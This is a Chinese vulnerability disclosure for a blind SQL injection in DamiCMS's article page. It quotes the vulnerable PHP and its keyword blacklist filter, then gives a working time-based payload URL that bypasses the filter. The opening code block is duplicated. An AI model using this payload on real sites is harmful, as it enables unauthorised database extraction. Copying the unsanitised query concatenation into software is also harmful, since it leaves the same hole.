### 简要描述: 大米CMS某处SQL盲注 ### 详细说明: 最新版大米CMS 文件/Web/Lib/Action/ArticleAction.class.php ``` public function index() { if(!isset($_GET['aid'])) { $this->error('非法操作'); } inject_check($_GET['aid']); inject_check($_GET['p']); $aid = intval($_GET['aid']); //读取数据库和缓存 ob_start(); //用于生成静态HTML $is_build = C('IS_BUILD_HTML'); //允许参数 $allow_param = array('p','keyword'); $static_file ='./Html/'.cookie('think_template').'/articles/'.$aid; $mid_str =''; if(count($_REQUEST) >1) { foreach($_REQUEST as $k=>$v){ if($k != 'aid' && in_array($k,$allow_param)){ $mid_str .= '/'.$k.'/'.$v; } } } $static_file .= ($mid_str .'.html'); $path = './ArticleAction.class.php'; $php_file = basename($path); parent::html_init($static_file,$php_file,$is_build); //以下是动态代码 $article = M('article'); $config = F('basic','','./Web/Conf/'); $page_model = 'page/page_default.html'; //相关判断 $alist = $article->where('aid='.intval($_GET['aid']))->find(); if(!$alist) { alert('文章不存在或已删除!',__APP__); } if($alist['islink'] == 1) {...
### 简要描述: 大米CMS某处SQL盲注 ### 详细说明: 最新版大米CMS 文件/Web/Lib/Action/ArticleAction.class.php ``` public function index() { if(!isset($_GET['aid'])) { $this->error('非法操作'); } inject_check($_GET['aid']); inject_check($_GET['p']); $aid = intval($_GET['aid']); //读取数据库和缓存 ob_start(); //用于生成静态HTML $is_build = C('IS_BUILD_HTML'); //允许参数 $allow_param = array('p','keyword'); $static_file ='./Html/'.cookie('think_template').'/articles/'.$aid; $mid_str =''; if(count($_REQUEST) >1) { foreach($_REQUEST as $k=>$v){ if($k != 'aid' && in_array($k,$allow_param)){ $mid_str .= '/'.$k.'/'.$v; } } } $static_file .= ($mid_str .'.html'); $path = './ArticleAction.class.php'; $php_file = basename($path); parent::html_init($static_file,$php_file,$is_build); //以下是动态代码 $article = M('article'); $config = F('basic','','./Web/Conf/'); $page_model = 'page/page_default.html'; //相关判断 $alist = $article->where('aid='.intval($_GET['aid']))->find(); if(!$alist) { alert('文章不存在或已删除!',__APP__); } if($alist['islink'] == 1) { Header('Location:'.$alist['linkurl']); } if($alist['status'] == 0) { alert('文章未审核!',__APP__); } $this->assign('title',$alist['title']); parent::tree_dir($alist['typeid'],'tree_list'); $type = M('type'); $list = $type->where('typeid='.intval($alist['typeid']))->find(); $this->assign('type',$list); $a = M('type')->where('typeid='.$alist['typeid'])->getField('page_path'); if( $a !='' && file_exists(TMPL_PATH.cookie('think_template').'/'.$a)){ $page_model = $a; } //网站头部 R('Public','head'); R('Public','py_link'); //统计处理 if($alist['status'] == 1) { $map['hits'] = $alist['hits']+1; //echo $_GET['aid']; $article->where('aid='.$_GET['aid'])->save($map); } ``` 看最后一行: ``` $article->where('aid='.$_GET['aid'])->save($map); ``` $_GET['aid']直接进入SQL了 这里在前面有检测$_GET['aid'] inject_check($_GET['aid']); 来看看这个inject_check函数,文件/Web/Common/common.php ``` //防止sql注入 function inject_check($str) { $tmp=eregi('select|insert|update|and|or|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $str); if($tmp) { alert("非法操作!",3); } else { return $str; } } ``` 这里过滤一些关键字,但是我们可以绕过进行盲注 这里可以是使用: ``` http://localhost/dami/index.php?s=/articles/127+||+if(hex(mid(user(),1,1))=72,sleep(1),0) ``` 这样就可以绕过,进行盲注了 ### 漏洞证明: 访问: ``` http://localhost/dami/index.php?s=/articles/127+||+if(hex(mid(user(),1,1))=72,sleep(1),0) ``` 这是会延迟18秒,由于默认安装大米cms后数据表中有18行数据,所以这里会延迟18s 具体利用见测试代码 [<img src="https://images.seebug.org/upload/201410/31171405ced41526f2a275b93c558d897097a378.png" alt="dami.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/31171405ced41526f2a275b93c558d897097a378.png)
